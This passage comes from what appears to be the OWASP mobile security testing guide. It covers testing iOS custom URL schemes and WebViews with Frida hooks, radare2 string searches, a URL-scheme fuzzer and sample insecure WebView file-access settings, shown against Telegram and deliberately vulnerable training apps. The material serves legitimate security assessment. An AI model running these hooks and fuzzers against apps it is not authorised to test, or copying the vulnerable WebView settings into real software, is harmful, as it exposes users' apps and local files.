func application(_ application: UIApplication, open url: URL, sourceApplication: String?) -> Bool {\n self.openUrl(url: url)\n return true\n}\n\nfunc application(_ application: UIApplication, open url: URL, sourceApplication: String?,\nannotation: Any) -> Bool {\n self.openUrl(url: url)\n return true\n}\n\nfunc application(_ app: UIApplication, open url: URL,\noptions: [UIApplicationOpenURLOptionsKey : Any] = [:]) -> Bool {\n self.openUrl(url: url)\n return true\n}\n\nfunc application(_ application: UIApplication, handleOpen url: URL) -> Bool {\n self.openUrl(url: url)\n return true\n}\n
We can observe some things here:
application:handleOpenURL:
and application:openURL:sourceApplication:annotation:
.openUrl
method. You can inspect it to learn more about how the URL request is handled.The method openURL:options:completionHandler:
and the deprecated openURL:
method of UIApplication
are responsible for opening URLs (i.e. to send requests / make queries to other apps) that may be local to the current app or it may be one that must be provided by a different app. If you have the original source code you can search directly for usages of those methods.
Additionally, if you are interested into knowing if the app is querying specific services or apps, and if the app is well-known, you can also search for common URL schemes online and include them in your greps. For example, a quick Google search reveals:
Apple Music - music:// or musics:// or audio-player-event://\nCalendar - calshow:// or x-apple-calevent://\nContacts - contacts://\nDiagnostics - diagnostics:// or diags://\nGarageBand - garageband://\niBooks - ibooks:// or itms-books:// or itms-bookss://\nMail - message:// or mailto://emailaddress\nMessages - sms://phonenumber\nNotes - mobilenotes://\n...\n
We search for this method in the Telegram source code, this time without using Xcode, just with egrep
:
$ egrep -nr \"open.*options.*completionHandler\" ./Telegram-iOS/\n\n./AppDelegate.swift:552: return UIApplication.shared.open(parsedUrl,\n options: [UIApplicationOpenURLOptionUniversalLinksOnly: true as NSNumber],\n completionHandler: { value in\n./AppDelegate.swift:556: return UIApplication.shared.open(parsedUrl,\n options: [UIApplicationOpenURLOptionUniversalLinksOnly: true as NSNumber],\n completionHandler: { value in\n
If we inspect the results we will see that openURL:options:completionHandler:
is actually being used for universal links, so we have to keep searching. For example, we can search for openURL(
:
$ egrep -nr \"openURL\\(\" ./Telegram-iOS/\n\n./ApplicationContext.swift:763: UIApplication.shared.openURL(parsedUrl)\n./ApplicationContext.swift:792: UIApplication.shared.openURL(URL(\n string: \"https://telegram.org/deactivate?phone=\\(phone)\")!\n )\n./AppDelegate.swift:423: UIApplication.shared.openURL(url)\n./AppDelegate.swift:538: UIApplication.shared.openURL(parsedUrl)\n...\n
If we inspect those lines we will see how this method is also being used to open \"Settings\" or to open the \"App Store Page\".
When just searching for ://
we see:
if documentUri.hasPrefix(\"file://\"), let path = URL(string: documentUri)?.path {\nif !url.hasPrefix(\"mt-encrypted-file://?\") {\nguard let dict = TGStringUtils.argumentDictionary(inUrlString: String(url[url.index(url.startIndex,\n offsetBy: \"mt-encrypted-file://?\".count)...])) else {\nparsedUrl = URL(string: \"https://\\(url)\")\nif let url = URL(string: \"itms-apps://itunes.apple.com/app/id\\(appStoreId)\") {\n} else if let url = url as? String, url.lowercased().hasPrefix(\"tg://\") {\n[[WKExtension sharedExtension] openSystemURL:[NSURL URLWithString:[NSString\n stringWithFormat:@\"tel://%@\", userHandle.data]]];\n
After combining the results of both searches and carefully inspecting the source code we find the following piece of code:
openUrl: { url in\n var parsedUrl = URL(string: url)\n if let parsed = parsedUrl {\n if parsed.scheme == nil || parsed.scheme!.isEmpty {\n parsedUrl = URL(string: \"https://\\(url)\")\n }\n if parsed.scheme == \"tg\" {\n return\n }\n }\n\n if let parsedUrl = parsedUrl {\n UIApplication.shared.openURL(parsedUrl)\n
Before opening a URL, the scheme is validated, \"https\" will be added if necessary and it won't open any URL with the \"tg\" scheme. When ready it will use the deprecated openURL
method.
If only having the compiled application (IPA) you can still try to identify which URL schemes are being used to query other apps:
LSApplicationQueriesSchemes
was declared or search for common URL schemes.://
or build a regular expression to match URLs as the app might not be declaring some schemes.You can do that by first verifying that the app binary contains those strings by e.g. using unix strings
command:
strings <yourapp> | grep \"someURLscheme://\"\n
or even better, use radare2's iz/izz
command or rafind2, both will find strings where the unix strings
command won't. Example from iGoat-Swift:
$ r2 -qc izz~iGoat:// iGoat-Swift\n37436 0x001ee610 0x001ee610 23 24 (4.__TEXT.__cstring) ascii iGoat://?contactNumber=\n
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0075/#testing-for-deprecated-methods","title":"Testing for Deprecated Methods","text":"Search for deprecated methods like:
application:handleOpenURL:
openURL:
application:openURL:sourceApplication:annotation:
For example, here we find those three:
$ rabin2 -zzq Telegram\\ X.app/Telegram\\ X | grep -i \"openurl\"\n\n0x1000d9e90 31 30 UIApplicationOpenURLOptionsKey\n0x1000dee3f 50 49 application:openURL:sourceApplication:annotation:\n0x1000dee71 29 28 application:openURL:options:\n0x1000dee8e 27 26 application:handleOpenURL:\n0x1000df2c9 9 8 openURL:\n0x1000df766 12 11 canOpenURL:\n0x1000df772 35 34 openURL:options:completionHandler:\n...\n
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0075/#dynamic-analysis","title":"Dynamic Analysis","text":"Once you've identified the custom URL schemes the app has registered, there are several methods that you can use to test them:
To quickly test one URL scheme you can open the URLs on Safari and observe how the app behaves. For example, if you write tel://123456789
in the address bar of Safari, a pop up will appear with the telephone number and the options \"Cancel\" and \"Call\". If you press \"Call\" it will open the Phone app and directly make the call.
You may also know already about pages that trigger custom URL schemes, you can just navigate normally to those pages and Safari will automatically ask when it finds a custom URL scheme.
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0075/#using-the-notes-app","title":"Using the Notes App","text":"As already seen in \"Triggering Universal Links\", you may use the Notes app and long press the links you've written in order to test custom URL schemes. Remember to exit the editing mode in order to be able to open them. Note that you can click or long press links including custom URL schemes only if the app is installed, if not they won't be highlighted as clickable links.
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0075/#using-frida","title":"Using Frida","text":"If you simply want to open the URL scheme you can do it using Frida:
$ frida -U iGoat-Swift\n\n[iPhone::iGoat-Swift]-> function openURL(url) {\n var UIApplication = ObjC.classes.UIApplication.sharedApplication();\n var toOpen = ObjC.classes.NSURL.URLWithString_(url);\n return UIApplication.openURL_(toOpen);\n }\n[iPhone::iGoat-Swift]-> openURL(\"tel://234234234\")\ntrue\n
In this example from Frida CodeShare the author uses the non-public API LSApplication Workspace.openSensitiveURL:withOptions:
to open the URLs (from the SpringBoard app):
function openURL(url) {\n var w = ObjC.classes.LSApplicationWorkspace.defaultWorkspace();\n var toOpen = ObjC.classes.NSURL.URLWithString_(url);\n return w.openSensitiveURL_withOptions_(toOpen, null);\n}\n
Note that the use of non-public APIs is not permitted on the App Store, that's why we don't even test these but we are allowed to use them for our dynamic analysis.
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0075/#identifying-and-hooking-the-url-handler-method","title":"Identifying and Hooking the URL Handler Method","text":"If you can't look into the original source code you will have to find out yourself which method does the app use to handle the URL scheme requests that it receives. You cannot know if it is an Objective-C method or a Swift one, or even if the app is using a deprecated one.
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0075/#crafting-the-link-yourself-and-letting-safari-open-it","title":"Crafting the Link Yourself and Letting Safari Open It","text":"For this we will use the ObjC method observer from Frida CodeShare, which is an extremely handy script that allows you to quickly observe any collection of methods or classes just by providing a simple pattern.
In this case we are interested into all methods containing \"openURL\", therefore our pattern will be *[* *openURL*]
:
-
and class +
methods.openURL
.$ frida -U iGoat-Swift --codeshare mrmacete/objc-method-observer\n\n[iPhone::iGoat-Swift]-> observeSomething(\"*[* *openURL*]\");\nObserving -[_UIDICActivityItemProvider activityViewController:openURLAnnotationForActivityType:]\nObserving -[CNQuickActionsManager _openURL:]\nObserving -[SUClientController openURL:]\nObserving -[SUClientController openURL:inClientWithIdentifier:]\nObserving -[FBSSystemService openURL:application:options:clientPort:withResult:]\nObserving -[iGoat_Swift.AppDelegate application:openURL:options:]\nObserving -[PrefsUILinkLabel openURL:]\nObserving -[UIApplication openURL:]\nObserving -[UIApplication _openURL:]\nObserving -[UIApplication openURL:options:completionHandler:]\nObserving -[UIApplication openURL:withCompletionHandler:]\nObserving -[UIApplication _openURL:originatingView:completionHandler:]\nObserving -[SUApplication application:openURL:sourceApplication:annotation:]\n...\n
The list is very long and includes the methods we have already mentioned. If we trigger now one URL scheme, for example \"igoat://\" from Safari and accept to open it in the app we will see the following:
[iPhone::iGoat-Swift]-> (0x1c4038280) -[iGoat_Swift.AppDelegate application:openURL:options:]\napplication: <UIApplication: 0x101d0fad0>\nopenURL: igoat://\noptions: {\n UIApplicationOpenURLOptionsOpenInPlaceKey = 0;\n UIApplicationOpenURLOptionsSourceApplicationKey = \"com.apple.mobilesafari\";\n}\n0x18b5030d8 UIKit!__58-[UIApplication _applicationOpenURLAction:payload:origin:]_block_invoke\n0x18b502a94 UIKit!-[UIApplication _applicationOpenURLAction:payload:origin:]\n...\n0x1817e1048 libdispatch.dylib!_dispatch_client_callout\n0x1817e86c8 libdispatch.dylib!_dispatch_block_invoke_direct$VARIANT$mp\n0x18453d9f4 FrontBoardServices!__FBSSERIALQUEUE_IS_CALLING_OUT_TO_A_BLOCK__\n0x18453d698 FrontBoardServices!-[FBSSerialQueue _performNext]\nRET: 0x1\n
Now we know that:
-[iGoat_Swift.AppDelegate application:openURL:options:]
gets called. As we have seen before, it is the recommended way and it is not deprecated.igoat://
.com.apple.mobilesafari
.-[UIApplication _applicationOpenURLAction:payload:origin:]
.0x1
which means YES
(the delegate successfully handled the request).The call was successful and we see now that the iGoat app was open:
Notice that we can also see that the caller (source application) was Safari if we look in the upper-left corner of the screenshot.
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0075/#dynamically-opening-the-link-from-the-app-itself","title":"Dynamically Opening the Link from the App Itself","text":"It is also interesting to see which other methods get called on the way. To change the result a little bit we will call the same URL scheme from the iGoat app itself. We will use again ObjC method observer and the Frida REPL:
$ frida -U iGoat-Swift --codeshare mrmacete/objc-method-observer\n\n[iPhone::iGoat-Swift]-> function openURL(url) {\n var UIApplication = ObjC.classes.UIApplication.sharedApplication();\n var toOpen = ObjC.classes.NSURL.URLWithString_(url);\n return UIApplication.openURL_(toOpen);\n }\n\n[iPhone::iGoat-Swift]-> observeSomething(\"*[* *openURL*]\");\n[iPhone::iGoat-Swift]-> openURL(\"iGoat://?contactNumber=123456789&message=hola\")\n\n(0x1c409e460) -[__NSXPCInterfaceProxy__LSDOpenProtocol openURL:options:completionHandler:]\nopenURL: iGoat://?contactNumber=123456789&message=hola\noptions: nil\ncompletionHandler: <__NSStackBlock__: 0x16fc89c38>\n0x183befbec MobileCoreServices!-[LSApplicationWorkspace openURL:withOptions:error:]\n0x10ba6400c\n...\nRET: nil\n\n...\n\n(0x101d0fad0) -[UIApplication openURL:]\nopenURL: iGoat://?contactNumber=123456789&message=hola\n0x10a610044\n...\nRET: 0x1\n\ntrue\n(0x1c4038280) -[iGoat_Swift.AppDelegate application:openURL:options:]\napplication: <UIApplication: 0x101d0fad0>\nopenURL: iGoat://?contactNumber=123456789&message=hola\noptions: {\n UIApplicationOpenURLOptionsOpenInPlaceKey = 0;\n UIApplicationOpenURLOptionsSourceApplicationKey = \"OWASP.iGoat-Swift\";\n}\n0x18b5030d8 UIKit!__58-[UIApplication _applicationOpenURLAction:payload:origin:]_block_invoke\n0x18b502a94 UIKit!-[UIApplication _applicationOpenURLAction:payload:origin:]\n...\nRET: 0x1\n
The output is truncated for better readability. This time you see that UIApplicationOpenURLOptionsSourceApplicationKey
has changed to OWASP.iGoat-Swift
, which makes sense. In addition, a long list of openURL
-like methods were called. Considering this information can be very useful for some scenarios as it will help you to decide what you next steps will be, e.g. which method you will hook or tamper with next.
You can now test the same situation when clicking on a link contained on a page. Safari will identify and process the URL scheme and choose which action to execute. Opening this link \"https://telegram.me/fridadotre\" will trigger this behavior.
First of all we let frida-trace generate the stubs for us:
$ frida-trace -U Telegram -m \"*[* *restorationHandler*]\" -i \"*open*Url*\"\n -m \"*[* *application*URL*]\" -m \"*[* openURL]\"\n\n...\n7310 ms -[UIApplication _applicationOpenURLAction: 0x1c44ff900 payload: 0x10c5ee4c0 origin: 0x0]\n7311 ms | -[AppDelegate application: 0x105a59980 openURL: 0x1c46ebb80 options: 0x1c0e222c0]\n7312 ms | $S10TelegramUI15openExternalUrl7account7context3url05forceD016presentationData\n 18applicationContext20navigationController12dismissInputy0A4Core7AccountC_AA14Open\n URLContextOSSSbAA012PresentationK0CAA0a11ApplicationM0C7Display010NavigationO0CSgyyctF()\n
Now we can simply modify by hand the stubs we are interested in:
The Objective-C method application:openURL:options:
:
// __handlers__/__AppDelegate_application_openUR_3679fadc.js\n\nonEnter: function (log, args, state) {\n log(\"-[AppDelegate application: \" + args[2] +\n \" openURL: \" + args[3] + \" options: \" + args[4] + \"]\");\n log(\"\\tapplication :\" + ObjC.Object(args[2]).toString());\n log(\"\\topenURL :\" + ObjC.Object(args[3]).toString());\n log(\"\\toptions :\" + ObjC.Object(args[4]).toString());\n},\n
The Swift method $S10TelegramUI15openExternalUrl...
:
// __handlers__/TelegramUI/_S10TelegramUI15openExternalUrl7_b1a3234e.js\n\nonEnter: function (log, args, state) {\n\n log(\"TelegramUI.openExternalUrl(account, url, presentationData,\" +\n \"applicationContext, navigationController, dismissInput)\");\n log(\"\\taccount: \" + ObjC.Object(args[1]).toString());\n log(\"\\turl: \" + ObjC.Object(args[2]).toString());\n log(\"\\tpresentationData: \" + args[3]);\n log(\"\\tapplicationContext: \" + ObjC.Object(args[4]).toString());\n log(\"\\tnavigationController: \" + ObjC.Object(args[5]).toString());\n},\n
The next time we run it, we see the following output:
$ frida-trace -U Telegram -m \"*[* *restorationHandler*]\" -i \"*open*Url*\"\n -m \"*[* *application*URL*]\" -m \"*[* openURL]\"\n\n 8144 ms -[UIApplication _applicationOpenURLAction: 0x1c44ff900 payload: 0x10c5ee4c0 origin: 0x0]\n 8145 ms | -[AppDelegate application: 0x105a59980 openURL: 0x1c46ebb80 options: 0x1c0e222c0]\n 8145 ms | application: <Application: 0x105a59980>\n 8145 ms | openURL: tg://resolve?domain=fridadotre\n 8145 ms | options :{\n UIApplicationOpenURLOptionsOpenInPlaceKey = 0;\n UIApplicationOpenURLOptionsSourceApplicationKey = \"com.apple.mobilesafari\";\n }\n 8269 ms | | TelegramUI.openExternalUrl(account, url, presentationData,\n applicationContext, navigationController, dismissInput)\n 8269 ms | | account: nil\n 8269 ms | | url: tg://resolve?domain=fridadotre\n 8269 ms | | presentationData: 0x1c4c51741\n 8269 ms | | applicationContext: nil\n 8269 ms | | navigationController: TelegramUI.PresentationData\n 8274 ms | -[UIApplication applicationOpenURL:0x1c46ebb80]\n
There you can observe the following:
application:openURL:options:
from the app delegate as expected.application:openURL:options:
handles the URL but does not open it, it calls TelegramUI.openExternalUrl
for that.tg://resolve?domain=fridadotre
.tg://
custom URL scheme from Telegram.It is interesting to see that if you navigate again to \"https://telegram.me/fridadotre\", click on cancel and then click on the link offered by the page itself (\"Open in the Telegram app\"), instead of opening via custom URL scheme it will open via universal links.
You can try this while tracing both methods:
$ frida-trace -U Telegram -m \"*[* *restorationHandler*]\" -m \"*[* *application*openURL*options*]\"\n\n// After clicking \"Open\" on the pop-up\n\n 16374 ms -[AppDelegate application :0x10556b3c0 openURL :0x1c4ae0080 options :0x1c7a28400]\n 16374 ms application :<Application: 0x10556b3c0>\n 16374 ms openURL :tg://resolve?domain=fridadotre\n 16374 ms options :{\n UIApplicationOpenURLOptionsOpenInPlaceKey = 0;\n UIApplicationOpenURLOptionsSourceApplicationKey = \"com.apple.mobilesafari\";\n}\n\n// After clicking \"Cancel\" on the pop-up and \"OPEN\" in the page\n\n406575 ms -[AppDelegate application:0x10556b3c0 continueUserActivity:0x1c063d0c0\n restorationHandler:0x16f27a898]\n406575 ms application:<Application: 0x10556b3c0>\n406575 ms continueUserActivity:<NSUserActivity: 0x1c063d0c0>\n406575 ms webpageURL:https://telegram.me/fridadotre\n406575 ms activityType:NSUserActivityTypeBrowsingWeb\n406575 ms userInfo:{\n}\n406575 ms restorationHandler:<__NSStackBlock__: 0x16f27a898>\n
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0075/#testing-for-deprecated-methods_1","title":"Testing for Deprecated Methods","text":"Search for deprecated methods like:
application:handleOpenURL:
openURL:
application:openURL:sourceApplication:annotation:
You may simply use frida-trace for this, to see if any of those methods are being used.
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0075/#testing-url-schemes-source-validation","title":"Testing URL Schemes Source Validation","text":"A way to discard or confirm validation could be by hooking typical methods that might be used for that. For example isEqualToString:
:
// - (BOOL)isEqualToString:(NSString *)aString;\n\nvar isEqualToString = ObjC.classes.NSString[\"- isEqualToString:\"];\n\nInterceptor.attach(isEqualToString.implementation, {\n onEnter: function(args) {\n var message = ObjC.Object(args[2]);\n console.log(message)\n }\n});\n
If we apply this hook and call the URL scheme again:
$ frida -U iGoat-Swift\n\n[iPhone::iGoat-Swift]-> var isEqualToString = ObjC.classes.NSString[\"- isEqualToString:\"];\n\n Interceptor.attach(isEqualToString.implementation, {\n onEnter: function(args) {\n var message = ObjC.Object(args[2]);\n console.log(message)\n }\n });\n{}\n[iPhone::iGoat-Swift]-> openURL(\"iGoat://?contactNumber=123456789&message=hola\")\ntrue\nnil\n
Nothing happens. This tells us already that this method is not being used for that as we cannot find any app-package-looking string like OWASP.iGoat-Swift
or com.apple.mobilesafari
between the hook and the text of the tweet. However, consider that we are just probing one method, the app might be using other approach for the comparison.
If the app parses parts of the URL, you can also perform input fuzzing to detect memory corruption bugs.
What we have learned above can be now used to build your own fuzzer on the language of your choice, e.g. in Python and call the openURL
using Frida's RPC. That fuzzer should do the following:
openURL
..ips
) in /private/var/mobile/Library/Logs/CrashReporter
.The FuzzDB project offers fuzzing dictionaries that you can use as payloads.
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0075/#using-frida_1","title":"Using Frida","text":"Doing this with Frida is pretty easy, as explained in this blog post to see an example that fuzzes the iGoat-Swift app (working on iOS 11.1.2).
Before running the fuzzer we need the URL schemes as inputs. From the static analysis we know that the iGoat-Swift app supports the following URL scheme and parameters: iGoat://?contactNumber={0}&message={0}
.
$ frida -U SpringBoard -l ios-url-scheme-fuzzing.js\n[iPhone::SpringBoard]-> fuzz(\"iGoat\", \"iGoat://?contactNumber={0}&message={0}\")\nWatching for crashes from iGoat...\nNo logs were moved.\nOpened URL: iGoat://?contactNumber=0&message=0\nOK!\nOpened URL: iGoat://?contactNumber=1&message=1\nOK!\nOpened URL: iGoat://?contactNumber=-1&message=-1\nOK!\nOpened URL: iGoat://?contactNumber=null&message=null\nOK!\nOpened URL: iGoat://?contactNumber=nil&message=nil\nOK!\nOpened URL: iGoat://?contactNumber=99999999999999999999999999999999999\n&message=99999999999999999999999999999999999\nOK!\nOpened URL: iGoat://?contactNumber=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n...\n&message=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n...\nOK!\nOpened URL: iGoat://?contactNumber=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n...\n&message=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n...\nOK!\nOpened URL: iGoat://?contactNumber='&message='\nOK!\nOpened URL: iGoat://?contactNumber=%20d&message=%20d\nOK!\nOpened URL: iGoat://?contactNumber=%20n&message=%20n\nOK!\nOpened URL: iGoat://?contactNumber=%20x&message=%20x\nOK!\nOpened URL: iGoat://?contactNumber=%20s&message=%20s\nOK!\n
The script will detect if a crash occurred. On this run it did not detect any crashed but for other apps this could be the case. We would be able to inspect the crash reports in /private/var/mobile/Library/Logs/CrashReporter
or in /tmp
if it was moved by the script.
For the static analysis we will focus mostly on the following points having UIWebView
and WKWebView
under scope.
Look out for usages of the above mentioned WebView classes by searching in Xcode.
In the compiled binary you can search in its symbols or strings like this:
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0076/#uiwebview","title":"UIWebView","text":"$ rabin2 -zz ./WheresMyBrowser | egrep \"UIWebView$\"\n489 0x0002fee9 0x10002fee9 9 10 (5.__TEXT.__cstring) ascii UIWebView\n896 0x0003c813 0x0003c813 24 25 () ascii @_OBJC_CLASS_$_UIWebView\n1754 0x00059599 0x00059599 23 24 () ascii _OBJC_CLASS_$_UIWebView\n
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0076/#wkwebview","title":"WKWebView","text":"$ rabin2 -zz ./WheresMyBrowser | egrep \"WKWebView$\"\n490 0x0002fef3 0x10002fef3 9 10 (5.__TEXT.__cstring) ascii WKWebView\n625 0x00031670 0x100031670 17 18 (5.__TEXT.__cstring) ascii unwindToWKWebView\n904 0x0003c960 0x0003c960 24 25 () ascii @_OBJC_CLASS_$_WKWebView\n1757 0x000595e4 0x000595e4 23 24 () ascii _OBJC_CLASS_$_WKWebView\n
Alternatively you can also search for known methods of these WebView classes. For example, search for the method used to initialize a WKWebView (init(frame:configuration:)
):
$ rabin2 -zzq ./WheresMyBrowser | egrep \"WKWebView.*frame\"\n0x5c3ac 77 76 __T0So9WKWebViewCABSC6CGRectV5frame_So0aB13ConfigurationC13configurationtcfC\n0x5d97a 79 78 __T0So9WKWebViewCABSC6CGRectV5frame_So0aB13ConfigurationC13configurationtcfcTO\n0x6b5d5 77 76 __T0So9WKWebViewCABSC6CGRectV5frame_So0aB13ConfigurationC13configurationtcfC\n0x6c3fa 79 78 __T0So9WKWebViewCABSC6CGRectV5frame_So0aB13ConfigurationC13configurationtcfcTO\n
You can also demangle it:
$ xcrun swift-demangle __T0So9WKWebViewCABSC6CGRectV5frame_So0aB13ConfigurationC13configurationtcfcTO\n\n---> @nonobjc __C.WKWebView.init(frame: __C_Synthesized.CGRect,\n configuration: __C.WKWebViewConfiguration) -> __C.WKWebView\n
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0077/","title":"Testing WebView Protocol Handlers","text":""},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0077/#overview","title":"Overview","text":""},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0077/#static-analysis","title":"Static Analysis","text":"If a WebView is loading content from the app data directory, users should not be able to change the filename or path from which the file is loaded, and they shouldn't be able to edit the loaded file.
This presents an issue especially in UIWebView
s loading untrusted content via the deprecated methods loadHTMLString:baseURL:
or loadData:MIMEType:textEncodingName: baseURL:
and setting the baseURL
parameter to nil
or to a file:
or applewebdata:
URL schemes. In this case, in order to prevent unauthorized access to local files, the best option is to set it instead to about:blank
. However, the recommendation is to avoid the use of UIWebView
s and switch to WKWebView
s instead.
Here's an example of a vulnerable UIWebView
from \"Where's My Browser?\":
let scenario2HtmlPath = Bundle.main.url(forResource: \"web/UIWebView/scenario2.html\", withExtension: nil)\ndo {\n let scenario2Html = try String(contentsOf: scenario2HtmlPath!, encoding: .utf8)\n uiWebView.loadHTMLString(scenario2Html, baseURL: nil)\n} catch {}\n
The page loads resources from the internet using HTTP, enabling a potential MITM to exfiltrate secrets contained in local files, e.g. in shared preferences.
When working with WKWebView
s, Apple recommends using loadHTMLString:baseURL:
or loadData:MIMEType:textEncodingName:baseURL:
to load local HTML files and loadRequest:
for web content. Typically, the local files are loaded in combination with methods including, among others: pathForResource:ofType:
, URLForResource:withExtension:
or init(contentsOf:encoding:)
.
Search the source code for the mentioned methods and inspect their parameters.
Example in Objective-C:
- (void)viewDidLoad\n{\n [super viewDidLoad];\n WKWebViewConfiguration *configuration = [[WKWebViewConfiguration alloc] init];\n\n self.webView = [[WKWebView alloc] initWithFrame:CGRectMake(10, 20,\n CGRectGetWidth([UIScreen mainScreen].bounds) - 20,\n CGRectGetHeight([UIScreen mainScreen].bounds) - 84) configuration:configuration];\n self.webView.navigationDelegate = self;\n [self.view addSubview:self.webView];\n\n NSString *filePath = [[NSBundle mainBundle] pathForResource:@\"example_file\" ofType:@\"html\"];\n NSString *html = [NSString stringWithContentsOfFile:filePath\n encoding:NSUTF8StringEncoding error:nil];\n [self.webView loadHTMLString:html baseURL:[NSBundle mainBundle].resourceURL];\n}\n
Example in Swift from \"Where's My Browser?\":
let scenario2HtmlPath = Bundle.main.url(forResource: \"web/WKWebView/scenario2.html\", withExtension: nil)\ndo {\n let scenario2Html = try String(contentsOf: scenario2HtmlPath!, encoding: .utf8)\n wkWebView.loadHTMLString(scenario2Html, baseURL: nil)\n} catch {}\n
If only having the compiled binary, you can also search for these methods, e.g.:
$ rabin2 -zz ./WheresMyBrowser | grep -i \"loadHTMLString\"\n231 0x0002df6c 24 (4.__TEXT.__objc_methname) ascii loadHTMLString:baseURL:\n
In a case like this, it is recommended to perform dynamic analysis to ensure that this is in fact being used and from which kind of WebView. The baseURL
parameter here doesn't present an issue as it will be set to \"null\" but could be an issue if not set properly when using a UIWebView
. See \"Checking How WebViews are Loaded\" for an example about this.
In addition, you should also verify if the app is using the method loadFileURL: allowingReadAccessToURL:
. Its first parameter is URL
and contains the URL to be loaded in the WebView, its second parameter allowingReadAccessToURL
may contain a single file or a directory. If containing a single file, that file will be available to the WebView. However, if it contains a directory, all files on that directory will be made available to the WebView. Therefore, it is worth inspecting this and in case it is a directory, verifying that no sensitive data can be found inside it.
Example in Swift from \"Where's My Browser?\":
var scenario1Url = FileManager.default.urls(for: .libraryDirectory, in: .userDomainMask)[0]\nscenario1Url = scenario1Url.appendingPathComponent(\"WKWebView/scenario1.html\")\nwkWebView.loadFileURL(scenario1Url, allowingReadAccessTo: scenario1Url)\n
In this case, the parameter allowingReadAccessToURL
contains a single file \"WKWebView/scenario1.html\", meaning that the WebView has exclusively access to that file.
In the compiled binary:
$ rabin2 -zz ./WheresMyBrowser | grep -i \"loadFileURL\"\n237 0x0002dff1 37 (4.__TEXT.__objc_methname) ascii loadFileURL:allowingReadAccessToURL:\n
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0077/#testing-webview-file-access","title":"Testing WebView File Access","text":"If you have found a UIWebView
being used, then the following applies:
file://
scheme is always enabled.file://
URLs is always enabled.file://
URLs is always enabled.Regarding WKWebView
s:
file://
scheme is also always enabled and it cannot be disabled.file://
URLs by default but it can be enabled.The following WebView properties can be used to configure file access:
allowFileAccessFromFileURLs
(WKPreferences
, false
by default): it enables JavaScript running in the context of a file://
scheme URL to access content from other file://
scheme URLs.allowUniversalAccessFromFileURLs
(WKWebViewConfiguration
, false
by default): it enables JavaScript running in the context of a file://
scheme URL to access content from any origin.For example, it is possible to set the undocumented property allowFileAccessFromFileURLs
by doing this:
Objective-C:
[webView.configuration.preferences setValue:@YES forKey:@\"allowFileAccessFromFileURLs\"];\n
Swift:
webView.configuration.preferences.setValue(true, forKey: \"allowFileAccessFromFileURLs\")\n
If one or more of the above properties are activated, you should determine whether they are really necessary for the app to work properly.
